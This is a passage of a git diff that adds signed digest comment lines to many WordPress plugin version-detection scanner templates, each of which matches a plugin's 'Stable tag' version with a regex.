a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 4e5046273d..a5627a7356 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100996c65504fa276044ff9a72b4ffe8a597f69cec349e8b30793cda937e34eca51022100a6b6262a8058645b3e8270081f059d20c74ef2d8c2463da7e188dcc22c0ac6f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index f44cee7980..4e07bace10 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203a4dd51509f4ddbb3e2d418da8ff0d7e0b7445ddb2be368fa04863c40b7ee15402206c6114fd46261569eb9172a017efb7fcacf661a3d6a1ebd0666982cd04a8edf0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 39130db767..62f827371c 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206f5906419027ca4e28dc5b5184a6fd3feaa0849a2bf1ef6f0140e71131b736d3022027400b303eff4f75389da5c5589f5f771c882484daeed6c81501b3579dcac971:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 39c497073c..0234036af9 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206c839da4ffae139e62619270f1fb153b917417a8bc0f02e0da3aebac03a12ae402201c104d8e26358d74626544d7a7e7f4fba7e3e69ce633cbcad378c6a905327ab4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index b848288b55..27a1e88fcf 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022059e9b8b59ef8a551ce14b2421a39e935471f958bde959a0c93e6d6892ca68ef6022005856757f5c912a57b2b7b42ade6bdd5e2227620728baa6689420fa211207d9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4d10178692..74c06b9e8d 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205bf1eb2f2c55f526ca76f8c5c9c25ac399f8c0e82f0b3a10dca29751597b5926022100b37309bff87f069707fdb6e039fb68dd6ed64c9cc3f0805e254e6470cfd6149c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 7aac0a153f..4dfda70cca 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202f121452f259672f5b407053694c483358ccee96bd2395aa631cc1198e76bde7022100d49938705cb53862344a047ad2fc4477979aeaa6a52368e55d4b65c358b3dce3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index d0cebd5316..8e23752da0 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a7afa6dcad2825c17c4ad45c79336afb59dc3afa80bafbb6f6779d4d7a178a70022100831f2ff96aac7869011749e444b59ba42b13ac929f7f1b34d7df3f8c8b73900f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index ff20779157..6b120a1097 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ad2ef908c15967ebb585997a30acada7f70043ed1b3db5f2726a19aae0775471022023285d1247296434ac8753be7c16f4c30019f6221806e75de7d469153308929d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index fffdc7d017..71cf83cb9b 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201e3c7e6476ab9770c7729acbef636ae99c70faf2276462d8856ba0f5f220e7d102210092b8e793c9004c8a637cea84f2a8d1ae5458ec703a38c25ece127475ecffb8e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7a9746a70d..a6238f92cd 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220712a774777fd430603104a71ca2050ee25b5f6059d409aa01d11ce854be41f22022100864927351753149ec79a124b443d634df21312f1443773f95f1efcea63d00d46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 3fe86debf5..52d4a0c30a 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022000b4887dd169d4f20dbec9ffd099920de0cfb8aab7ad6e072b8d7ab967793505022100aaebb02d59c636d322d2f7263e709bf9b0443b53365e52e8b4d001fc1c495b6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 18a7437e94..b09a567b64 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022068d8281eccca3adcaf0f73fda79ec2dd4578e239f25143e75eea16036022826c022100d93a42f74c0a37e5939fc49a80904752d8012b32487e475d29833df2f6d37046:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3deac58709..83baac132e 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022022278b708e3696d38c407449ea7ba2813ac3410cd73bf7f994302aadcfa060f4022023db93cffa53f8c26951e0423acf14bc8551b378c92cb9f661f819be43ca0075:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e7e7c27682..daf2c7ab04 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022066cf876baa9b565ab6541d1dfcfeb3ecfed665f86eab9ac51408245b095588ab022100ee6c165cc7a94c4dbd81cb463d3e26f1c7bbcde588864acf3d4f9774c4d348c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index ad4ebefa4b..bee4359f5e 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022005a6dd258ff77aab78c18fbf983b6ae48552984aabda65c1c7ba35024501a4e9022100c36541820ba03c166388d50dd68d28e8df91b07a5d5439868239ab1f0121d4e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 8e88c81c0a..383e0b3409 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008c062d8b4b21803d6faee3dc304cc9439a971a63406ba6647c0e56c95c02b947022100851d7a1dba1a0c54c3d323c31b2d06b19e21986f0ceceaabc97281089434d223:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 39d269fb85..a2602c428f 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100aea99cdb5e168ef33afda2938481c3dcafb9196ae0d8e1592a33e46c1b0c1ee2022100efa19a4ca4d634992caa586ed1f998919e69176c6c413d02a4d91298c36b9551:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index fc126d83c6..8a4e6c5e95 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100979b8db91d3c72ea91359957ccd92746a20d60a266e1274432ab492c9f3ba703022025502058d452a7766430cb00498061d19bc176fe96fb1918cbc600e69ba19ab0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 8c49a34259..f49477e531 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008e5aabb2bee253960734b84bc5e8234701281cbd21e8d44ed3a8eb5ad24beb8702205bcf0081803875ec3ef0d02fa60a326a86be50bde4dd425c651937ffb2447350:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index c20ed6552a..c680f9bd70 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220155ff5f184e83253a5ec48786e9b26f5566e3a736e25950fc010c292d6caad53022100811bcb0294a3f3878a37cf8389f7bdf6c9f5f0970686e1106ecda3f502117558:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 6ac2212b4b..b1eac7585c 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d1ddc3de05b2efcc4b20c7c2f1136c05a04d851eca0a29bc96c9d20df4287c69022056e1756ea4f987e5c1e7e68fd2decb4a0fdc9970b218c180b4615c6da2b7a793:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 71c71b5ed1..7d97737d04 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200abfbd4e30f5bdaca1611d5adfe588ed436ea70b20c5c6bf44e930cc2b79cd520221009febda1024b6e8259c977c05374e6e605fec28aaf3b0fec1f7035b972d059d06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7b47adc274..390e137cac 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022007bdf88fe4ebfc78b25ecb872b24b1e483af0bd72611ebab819a3110e600989e02201182a88be9143767c59c7d02d14a655748d0eeb5322c97c6efbe29833afc246e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 286dfdaec6..f866a5533c 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a4de5a931fce5d5d34dd816472b3dcdcfa036cc1880c8e4d208b92a201a3798b02203f68b59daa3acf4d24b0b2400a94f0ab6b629b09f50d5c7ebe019852946cc5ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index c4928059f6..2fb21ebd19 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204df94a47e55fa8437071e101e3c782e916e841f5d9695209715cc006ceefdbed02201a612f6f6322d3c3ccf10924a38a86ac6e58d0d89e69e8f8a6bab512d8283f77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index f6a7836f35..daa8a89f1a 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a55fd33d29e0138b9a91dc7b6ec2083f0edbc66504487b8a9abc93111795a7b802203928e312bad9f05be2eeb241da1ba630ec1b71a04eddb51c5ea73c7fe4c41348:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index b7af708c4f..43dc5974c1 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203780774630eb0b80372c6d1c86ce2f7d0e7407408c8d8c5fdfc0a3292e698838022100c29ff7b64957923834c61a261aaae9c920d279d90975f7cf0eb45b6307b7105b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 61a793edf7..e415e173d1 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022017f0ac373d219a2b740f5f6f317e2bed573d250fc8fd11dd63d446eede525e5e0221009d4e23851c6be23f1f2fa8493c8f9d35438206b8acf4e5bd15b3288136e3c771:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 0da88d5d3f..bd7699f6ec 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a9250325a9c7b7bf3460eb368738763c2e4abbbb3c17514ac499ea928f938e96022100e739dc38ea3d2f9f08245382bca490102d0bd62cacc1cf4c669f542439c5491f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 2b29428cf1..5d442c68c7 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201c74eb22070b786cb852fec72eb6a217cf1ec975219120201cebc771d042ff3d02201f37977697fd5e89423aba864d38ae153c68fb0231f0ddf6c7c242dfde73f3c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 181e619a7c..2924cceec7 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ca167159b715e7342af379315916c39a861d8fa1db494f49d4eeb0d4c58b042402204347670b2bbda4f8ded5efefe53149deb9769054bb1112a150b9642e1a599b5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8164eb4483..6e98acaa55 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022063cdb8f40f47d59c3dbbac969cd1cafd1e53454ba2f9234499fdfbb8d8928321022100dceef35ba7254ec3fa06978f8cf1469d8051eaa0ae416d8804d333ba272d96ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 59554defdf..715b7f9fc0 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202be7e42c76f37c1804b3a7283733b749531c3d04dd1be789cb0f13ad48880846022100e97e4a20e5af59389db0388a34278a8d2ed1a4badaab6513759f1069f61a000d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 350fd9436b..2262ae47b8 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022050761b6503c98f01561111871f9b8eff789ba96db31353e4d908d93c424d3d9202202d9b78c5aa704d3b35e31d1659c93e85e674c2c99d616c21ffcfd79a8fcc9f15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 2ae6bafbba..0c61bacf17 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210097c9b45a2b0b5ad0d4b20b7151a581cbfdb78425f011984f1d81fe27e798bae202204649eda04f8d32a1bd16d38e17905cae24a61e545207e437a74409d43bf33708:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d0dc8d92bb..62a5c2791a 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210093208f4544374ead9506bd1274675b2d92afb9d12d6b336d07330d3b7d72d520022059a822256b284f210bdf8653d3a10a97004e074320ec5cd1d0ce66fd37d7b3b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index c49bbc2b6d..67b382c9a4 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009f813791da6cc7113b0d45b986d1c705b6fe329dd430e0555cb06c588c76fd3c02206c6ff0d281972bc079ff8342dfb33eb165182de4bd42263fc2fdc802b04970cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 27586cbd9d..7cea615685 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f73fe06556ca4f14e6dbefd0574e1f4a1aed39038be0cc266519a51131adcada022100f3f88eaa0d3be61fecb6f65ba1c56aefd5996813813c6862c6ebccbebf366abc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 946272f0a9..5f30c9078d 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100be3fa22aff21f7db47174dce95fdc5448a1dd087a4ed3e9047600af7bbff593e022100e5b6f5e099925e40598dbe6554c6301dea8b3c8e983d1579a72a2e6d5acec917:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index aa29706872..d67838e39c 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210099f5e88a5d21c69667d22e471b9113511a354419da86194c1880a4ee7f73719d02200726c12e2486232ad6185b5d0d8f95526741e76867adcb4edefc4c7b77e5e093:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 290d53ab7e..62976fadac 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008855339c7751b360e33b130b461233c593c6a30423f18462ca2857fe7d59b02f022100bfbd7ddca6bead14e3e312460edb487edd28b98911bbfe27a20fab442e1aa93f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index e83e8d79e7..a099a483a0 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201013c5bbbcab93d63627dfeca448d2481d0a84656d2ff76777523f1942a36a68022100ecb7b63531f2bbdc2ca51fabb471c862dd87a60fcab5e528a2f03a42e124c99a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index f1c16275a2..8fa01a96e7 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202d7a0824c64cac98d593febc8f31b009126933752c3e9d27f7fbfed3e82725ea02202bc9e186b674790e3bcf1d4694f9dd5c0879248b64d84c6ceb2a6b3189146985:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index fc072e19d8..0741418c0d 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b77f3b600a06cbbf5fd625f623a3b21caadc7d0c6f665b71f8cc535c27ccceb9022100fb8e58140097038269b37cd2a6021df8aa77237aff6dcb61773cd6bc1c0adffb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index da9df0e8a5..895cdb890e 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b54da4213f440867f265f89f3691ba60dc03f536bae6561ff68e661937b49990022100eca20a2bb85cd12a4cfca7582a6b8a0a4acbc6e8c9af0233261410bf72f1318b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index f8113d9750..0e1994a4fc 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,3 +46,4 @@ http: part: body regex: - 